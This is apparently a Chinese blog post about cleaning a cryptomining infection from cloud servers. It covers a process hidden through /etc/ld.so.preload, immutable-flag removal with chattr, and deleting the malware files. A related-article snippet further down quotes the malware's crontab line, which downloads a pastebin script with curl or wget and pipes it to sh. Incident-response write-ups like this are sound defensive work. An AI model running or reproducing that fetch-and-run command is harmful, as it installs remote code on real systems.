云服务器怎么清理系统盘,云服务器中挖矿病毒的清除过程

最新推荐文章于 2023-08-09 15:19:00 发布
最新推荐文章于 2023-08-09 15:19:00 发布
阅读量404 收藏
点赞数
文章标签: 云服务器怎么清理系统盘

背景

发现云上的两台ECS服务器CPU占用率过高,重启后依然如此。

使用top命令查看很奇怪:CPU虽然两个核占用100%,但是进程中没有看到占用CPU的进程,使用ps命令也看不出异常。似乎进程被隐藏了。

d4b3d87fdc51

image.png

诊断

改用busybox top命令,能发现被隐藏的进程,叫/bin/daemon

d4b3d87fdc51

Snipaste_2021-07-23_18-07-40.png

查看/bin/deamon被修改的时间,发现是几个月前的夜里02:55,很可疑

同目录被修改的,还有一个文件/bin/config.json文件,其内容为

d4b3d87fdc51

image.png

查了域名,是个矿池网站,所以显然这是个挖矿病毒

d4b3d87fdc51

image.png

为什么top命令看不到这个进程呢,因为/etc/ld.so.preload被修改了,让top和ps命令把关键进程都隐藏了

cat /etc/ld.so.preload

# 内容:

/usr/local/lib/uncompress.so

但是无法直接编辑此文件

解决

接下来就是删除相关文件了

恢复top命令

首先解决/etc/ld.so.preload被修改的问题,但是此文件只读,无法编辑,使用lsattr查看发现被保护了,因此使用chattr解除保护。

# 查看文件属性,被保护

lsattr /etc/ld.so.preload

----ia--------e--- /etc/ld.so.preload

# 解除保护

chattr -ia /etc/ld.so.preload

# 查看文件属性,保护已经解除

lsattr /etc/ld.so.preload

--------------e--- /etc/ld.so.preload

这里可能会出现一个情况:chattr和lsattr命令运行了没反应,或者提示没有权限,此时用ll查看这两个命令文件,发现是空文件

ll /usr/bin/chattr

-rw-r--r-- 1 root root 0 Feb 2 03:13 /usr/bin/chattr

如果出现这种情况,需要从另一台同样操作系统的服务器恢复这两个文件到此服务器,具体参考服务器中毒导致的wget等系统命令失效后的恢复

随后编辑内容,去除其中的注入文件,保存退出

vim /etc/ld.so.preload

# 删除其中的内容

此时使用top命令,可以看到进程

d4b3d87fdc51

Snipaste_2021-07-23_18-07-58.png

删除病毒文件

杀掉病毒进程

kill -9 2420

删除病毒文件

chattr -ia /bin/daemon

rm /bin/daemon

chattr -ia /usr/local/lib/uncompress.so

rm /usr/local/lib/uncompress.so

防范

目前还不清楚病毒是如何注入的,亡羊补牢,先做一些防范措施包括

清除.ssh/authorized_keys文件中不明来历的key

取消/usr/bin/curl和/usr/bin/wget的执行权限

征昊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
挖矿病毒解决实例(隐藏进程,文章较好)(入侵)
墨痕诉清风的博客
01-06 1万+
CPU起飞了 最近有朋友在群里反馈,自己服务器的CPU一直处于高占用状态,但用top、ps等命令却一直找不到是哪个进程在占用,怀疑挖矿病毒,急的团团转。 根据经验,我赶紧让他看一下当前服务器的网络连接,看看有没有可疑连接,果然发现了有点东西: 上Shodan查一下这IP地址: 反向查找,发现有诸多域名曾经解析到这个IP地址: 这是一个位于德国的IP地址,开放了4444,5555,7777等数个特殊的服务端口: 其这位朋友服务器上发现的连接到的是7777端口,
【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
weixin_54707168的博客
02-22 649
【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
清理服务器挖矿进程kswapd0 & tsm
MaggieTang0622的博客
11-25 1109
挖矿进程kswapd0&tsm清理
服务器c盘清理文件,云服务器c盘满了怎么清理
weixin_42465030的博客
08-09 1301
云服务器c盘满了怎么清理 内容精选换一换当您购买的弹性云服务器规格无法满足业务需要时,可参考本章节变更规格,升级vCPU、内存。对于部分类型的弹性云服务器,您还可以在变更规格时,更换弹性云服务器的类型。“XEN实例”变更为“KVM实例”,需先手动配置弹性云服务器,安装对应的驱动,然后再变更规格。否则,规格变更后的弹性云服务器不可用(操作系统可能无法启动)。“XEN实例”变更为“华为云帮助心,为用...
清理阿里云服务器ECS的Linux服务器系统盘无故被占满的问题
weixin_33811539的博客
07-12 740
为什么80%的码农都做不了架构师?>>> ...
怎么清理文件缓存文件云服务器,服务器运行内存怎么清理缓存
weixin_30446969的博客
08-06 773
服务器运行内存怎么清理缓存 内容精选换一换系统长期运行后,free命令查看系统内存,发现剩余内存不足,大部分是buffers和cached。在 Linux 的内存管理,buffer是Linux内存的Buffer cache。cache是Linux内存的Page cache。Buffer cache:主要是当系统对块设备进行读写的时候,对块进行数据缓存的系统来使用,即对块的操当您发现云服务器的...
腾讯云linux 卸载数据盘,如何卸载腾讯云硬盘
weixin_32595533的博客
05-09 444
操作场景当您需要将磁盘属性为数据盘的弹性云硬盘挂载到另一台云服务器上使用时,您可以主动地从云服务器卸载该弹性云硬盘,并将其挂载到其他云服务器上。卸载弹性云硬盘并不会清除该硬盘上的数据。目前支持卸载磁盘属性为数据盘的弹性云硬盘,不可卸载系统盘和非弹性云硬盘。卸载云硬盘前需先执行umount(Linux)或脱机(Windows)操作,否则可能会导致该云服务器再次挂载弹性云硬盘时无法识别。前提条件卸载数...
一次挖矿病毒处理过程
weixin_42433054的博客
12-13 9787
事件背景 深度威胁检测设备发现大量的DNS response of a queried malware Command and Control domain告警事件,尝试进行C&C攻击,根据分析,因终端感染病毒病毒文件尝试访问恶意网址,首先到DNS上进行解析,但是内网DNS无法解析到该域名,导致解析失败,同时该恶意域名被入侵检测设备检测到。现在明确终端毒,本次过程通过深入发掘通信...
病毒分析之“驱动人生”挖矿木马分析及其清除方案
Hades的博客
11-01 1万+
“驱动人生”挖矿木马分析及其清除方案 0x00 概述 自2018年12月份”驱动人生“挖矿木马爆发以来,此木马一直处于活跃状态,更新版本更是达到了20+次。此木马感染量之大,传播速度之快,可称得上是国内挖矿排行”第一“的木马。 从最开始的有文件落地的单独可执行EXE,到后来的python版EXE,再到随机膨胀文件版本,再到后来的PowerShell无文件攻击版本。从单一攻击手法,到后来的漏洞...
linux服务器异常掉电记录,记录一次断电导致centos7.4系统不能正常进入的解决方案...
weixin_27038245的博客
05-03 3010
情况描述:园区意外断电,导致服务器centos7.4系统不能正常进入,一直卡在进度条界面,按esc或者f5能够看到详细的错误,主要有三个服务报错,如下图:chronyd、Postfix、polkit服务启动失败分析情况:这几个服务都是centos下常见的服务,chronyd是时间同步服务,Postfix是邮件服务,polkit是linux服务器上面的一种服务器方法进程,是不是最后一个服务失败导致系...
网站云服务器清理,云服务器内存怎么清理
weixin_32236415的博客
08-11 482
云服务器内存怎么清理 内容精选换一换您可以通过本节内容解决如下问题:用户在管理控制台执行弹性云服务器相关操作后出现异常,针对管理控制台提示的异常信息,应该如何处理?用户参见《弹性云服务器接口参考》调用云服务器相关的API接口时,如果返回错误码,应该如何处理?用户通过管理控制台执行弹性云服务器的相关操作后,弹性云服务器列表页面将显示相应操作的申请状态。通过申请状态显示的信息在“资源使用详情”区域内...
如何检查清理 服务器系统盘
whiskylu的专栏
03-05 419
如何检查清理 服务器系统盘 1.清理不必要的系统用户。电脑属性--系统属性--用户配置文件--设置--“删除不必需的用户配置文件” 2.检查系统C盘:C:\Windows\System32\winevt路径下的系统日志文件。清理归档日志 ...
腾讯云linux数据盘格式化,腾讯云服务器分区及格式化数据盘
weixin_29605297的博客
05-12 268
腾讯云服务器分区及格式化数据盘当您购买了数据盘时,需要格式化才可使用。未购买数据盘的用户可以跳过此步骤。这里以CentOS为例进行说明。注意:仅支持对数据盘进行分区,不支持对系统盘进行分区。若您强行对系统盘分区可能导致系统崩溃等严重问题,针对此种情况腾讯云不承担赔偿责任。1) 通过步骤四介绍的方法登录Linux云服务器。2) 输入命令fdisk -l查看您的数据盘信息,注意:在没有分区和格式化数据...
Linux 库文件劫持
travelnight的博客
09-09 2118
Linux库文件劫持
linux服务器Centos7病毒记录
on the way . . .
03-23 2786
Background 用的华为的弹性云服务器,直到这一次,之前已经出现过三四次,想到这一次也不会是最后一次,记录下,防止因为同样的问题再次毒。 1、2022-03-23 毒后部分系统命令不能用。有的能用的也会夹杂一些其他的错误信息。 ERROR: ld.so: object '/usr/local/lib/uncompress.so' from /etc/ld.so.preload cannot be preloaded: ignored. 毒效果图 症状分析 由上图可以看出,加载/
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 3791
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
ERROR: ld.so: object '/usr/local/lib/libftp.so' from /etc/ld.so.preload cannot be preloaded: ignored
热门推荐
hh_hh1816的博客
05-01 1万+
记一次问题的排查史-2020-5-1 第一次写blog,排版略显粗糙,文章有引用博友的链接,望海涵 问题由来: 分析: 执行vim /etc/ld.so.preload可发现该文件打印如下语句: /usr/local/lib/libftp.so 结合报错信息:ERROR: ld.so: object '/usr/local/lib/libftp.so' from /etc/ld....
腾讯云服务器被恶意挖矿处理建议----检测到存在待处理的恶意文件:/usr/share/xmrigMiner,威胁等级:严重,您的服务器疑似被黑客入侵,建议您及时确认,避免造成严重损失。
最新发布
weixin_58622844的博客
08-09 3004
事情是这样的,前两天搭建微服务项目的时候需要用到服务器,第一天刚部署上项目,紧接着第二天就被黑客扫了,既没办法访问,也没办法远程连接。
kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://p
weixin_33968104的博客
05-21 609
一. 症状及表现CPU使用率异常高,外出流量异常crontab异常,存在如下定时任务(基本上就可以确定了)[root@mdw ~]# crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh12在...
Mac下Ubuntu系统配置阿里云服务器图文指南
本篇教程详细介绍了在Mac系统下配置和访问阿里云服务器(基于Ubuntu系统)的步骤。首先,用户需要购买阿里云服务器,通过官网注册账号,选择合适的配置并完成购买。在管理控制台确认服务器状态后,进行域名注册与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值